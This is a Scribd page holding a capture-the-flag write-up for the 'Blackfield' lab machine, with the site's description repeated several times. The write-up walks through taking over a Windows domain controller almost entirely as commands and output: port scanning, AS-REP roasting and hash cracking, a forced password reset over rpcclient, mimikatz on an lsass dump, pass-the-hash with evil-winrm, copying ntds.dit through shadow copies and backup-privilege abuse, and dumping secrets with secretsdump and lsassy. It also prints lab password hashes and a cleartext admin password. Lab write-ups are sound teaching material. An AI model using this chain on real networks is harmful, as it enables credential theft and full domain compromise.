Scribd Logo
Upload

Welcome to Scribd!

  • 77 views

    Blackfield

    Uploaded by

    Jean Pierre
    1. The document summarizes the steps taken to exploit a Windows domain controller. Masscan was used to discover open ports including SMB ports. SMB shares were enumerated and user accounts were harvested to a file. Kerberos tickets were retrieved including for the 'support' user. The support hash was cracked and the audit2020 password was reset using the support account. Privilege escalation was achieved through abusing backup privileges to extract secrets from the NTDS database file. These secrets were cracked to retrieve hashes and cleartext passwords, including for the domain admin account.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    Blackfield

    Uploaded by

    Jean Pierre
    77 views3 pages
    1. The document summarizes the steps taken to exploit a Windows domain controller. Masscan was used to discover open ports including SMB ports. SMB shares were enumerated and user accounts were harvested to a file. Kerberos tickets were retrieved including for the 'support' user. The support hash was cracked and the audit2020 password was reset using the support account. Privilege escalation was achieved through abusing backup privileges to extract secrets from the NTDS database file. These secrets were cracked to retrieve hashes and cleartext passwords, including for the domain admin account.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    1. The document summarizes the steps taken to exploit a Windows domain controller. Masscan was used to discover open ports including SMB ports. SMB shares were enumerated and user accounts were harvested to a file. Kerberos tickets were retrieved including for the 'support' user. The support hash was cracked and the audit2020 password was reset using the support account. Privilege escalation was achieved through abusing backup privileges to extract secrets from the NTDS database file. These secrets were cracked to retrieve hashes and cleartext passwords, including for the domain admin account.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    77 views3 pages

    Blackfield

    Uploaded by

    Jean Pierre
    1. The document summarizes the steps taken to exploit a Windows domain controller. Masscan was used to discover open ports including SMB ports. SMB shares were enumerated and user accounts were harvested to a file. Kerberos tickets were retrieved including for the 'support' user. The support hash was cracked and the audit2020 password was reset using the support account. Privilege escalation was achieved through abusing backup privileges to extract secrets from the NTDS database file. These secrets were cracked to retrieve hashes and cleartext passwords, including for the domain admin account.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 3

    1.

    Opened ports:
    `
    #masscan -i tun0 10.10.10.192 -p0-65535 --rate 10000
    Discovered open port 88/tcp on 10.10.10.192
    Discovered open port 445/tcp on 10.10.10.192
    Discovered open port 593/tcp on 10.10.10.192
    Discovered open port 135/tcp on 10.10.10.192
    53/udp open domain (generic dns response: SERVFAIL)
    `
    2. SMB listing:
    smbclient -L //10.10.10.192
    Sharename Type Comment
    --------- ---- -------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    forensic Disk Forensic / Audit share.
    IPC$ IPC Remote IPC
    NETLOGON Disk Logon server share
    profiles$ Disk
    SYSVOL Disk Logon server share
    # smbclient //10.10.10.192/profiles$
    smb: \> dir
    . D 0 Wed Jun 3 16:47:12 2020
    .. D 0 Wed Jun 3 16:47:12 2020
    AAlleni D 0 Wed Jun 3 16:47:11 2020
    ABarteski D 0 Wed Jun 3 16:47:11 2020
    --[SNIP]--
    `
    3. Copy the usernames to a file users.txt and scan for Kerberos tickets:
    GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format hashcat -output
    hashes.asreproast -dc-ip 10.10.10.192

    ...
    [*]Getting TGT for support
    $krb5asrep$23$support@BLACKFIELD.LOCAL:422866063277e0f25f87931e6c192bba$cbe1cd70856
    35f4b1c527d3e42fe9d3a2417581bb24ba9ae75aa1cfceff09e071474aa7b535322575c06527cbd0afe
    aead168eb52488cd1ef4e81f231c1d5bee649b5eab98cb9c9a164330a254e2d4a4c80104f46a77aeb3a
    a108012546cda176a34eff1679fc4c72396e8c55b30b6ba79eece732dfd507830b5fba05544f8a31dd6
    42c47f6fed69daaa5074cf6cddc212c71ca2a9718bf20039064025b911143e001e19f960d9d24a776df
    1edde005c0c2ec484c92dacb4c6495aa4b38547304efedbb60e341eeeee8217477a0b375a48ea86beb4
    552ec2b4e6cbbaf0d5976e6b5bf9c5478aff89bd7bf5bc3b420fc741fbd62d
    `
    4. Crack it:
    `
    # john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast
    `
    5. We can reset or change the password https://malicious.link/post/2017/reset-ad-
    user-password-with-linux/ for audit2020 using support
    # rpcclient -U support //10.10.10.192
    rpcclient $> setuserinfo2 audit2020 23 'ICanHaz1ChzBrger'
    rpcclient $> quit

    # smbclient.py audit2020@10.10.10.192
    WORKS!!
    `

    6. Grab lsass.zip so it can be mimikatzed https://medium.com/@Ali.bawazeeer/using-


    mimikatz-to-get-cleartext-password-from-offline-memory-dump-76ed09fd3330
    `
    mimikatz # sekurlsa::minidump lsass.DMP
    mimikatz # sekurlsa::logonPasswords full
    `

    1. Using the found hash I can login with evil-winrm using svc_backup

    `
    # evil-winrm -H 9658d1d1dcd9250115e2205d9f48400d -u svc_backup -i 10.10.10.192
    *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\Desktop
    `

    2. Time to privesc

    `
    *Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
    `
    3. Enumerating you will find notes.txt and since svc_backup has backup ability
    robocopy can be exploited in a way
    `
    *Evil-WinRM* PS C:\Documents and Settings\Administrator\Desktop> robocopy
    C:/Users/Administrator/Desktop/ C:\Temp\ /B
    100%
    `
    `
    *Evil-WinRM* PS C:\Temp\> type notes.txt
    `

    4. We have to create a shadow copy to get the secrets

    `
    diskshadow.txt - leave the spaces at the end of every line or else it will not
    work:
    set context persistent nowriters
    add volume c: alias tester
    create
    expose %tester% z:
    exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\4thelolz\ntds.dit
    delete shadows volume %tester%
    reset

    *Evil-WinRM* PS C:\> diskshadow /s diskshadow.txt


    Exec cmd may not work. ignore if not and make sure z: exists. if so, you can
    continue

    5. Now to upload SeBackupPrivilegeCmdLets


    [https://github.com/giuliano108/SeBackupPrivilege.git] and collect items for secret
    extraction:
    https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLe
    ts/bin/Debug/SeBackupPrivilegeUtils.dll?raw=true
    https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLe
    ts/bin/Debug/SeBackupPrivilegeCmdLets.dll?raw=true
    `
    *Evil-WinRM* PS C:\Temp\> upload /a/place/for/tools/SeBackupPrivilegeCmdLets/
    *Evil-WinRM* PS C:\Temp\> cd SeBackupPrivilegeCmdLets
    *Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Import-Module
    .\SeBackupPrivilegeUtils.dll
    *Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Import-Module
    .\SeBackupPrivilegeCmdLets.dll
    *Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Set-SeBackupPrivilege
    *Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Copy-FileSebackupPrivilege
    z:\Windows\NTDS\ntds.dit C:\temp\4thelolz\ntds.dit
    *Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> reg save hklm\system
    C:\temp\4thelolz\system.bak
    `
    6. Send the artifacts to the attack box

    `
    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download ntds.dit
    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download system.bak
    `

    7. Dump them secrets:

    `
    # secretsdump.py -ntds ntds.dit -system system.bak LOCAL
    `
    8. Evil winrm connect using the hash as administrator

    `
    # evil-winrm -H 184fb5e5178480be64824d4cd53b99ee -u administrator -i 10.10.10.192

    Using Lsassy we can get the cleartext password and get NT Authority\System:
    lsassy -d BLACKFIELD.LOCAL -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
    10.10.10.192 -m 0 --procdump /opt/Sysinternals/procdump.exe --dumpert
    /opt/Sysinternals/dumpert.exe

    #[10.10.10.192] BLACKFIELD\Administrator 184fb5e5178480be64824d4cd53b99ee[+]


    [10.10.10.192] BLACKFIELD.local\Administrator ###_ADM1N_3920_###

    NT Authority\System:
    # psexec.py Administrator:###_ADM1N_3920_###@10.10.10.192
    # evil-winrm -p "###_ADM1N_3920_###" -u administrator -i 10.10.10.192

    Full dump can be done:


    secretsdump.py -just-dc-ntlm
    BLACKFIELD.LOCAL/administrator:"###_ADM1N_3920_###"@10.10.10.192 -use-vss

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee
    :::

    You might also like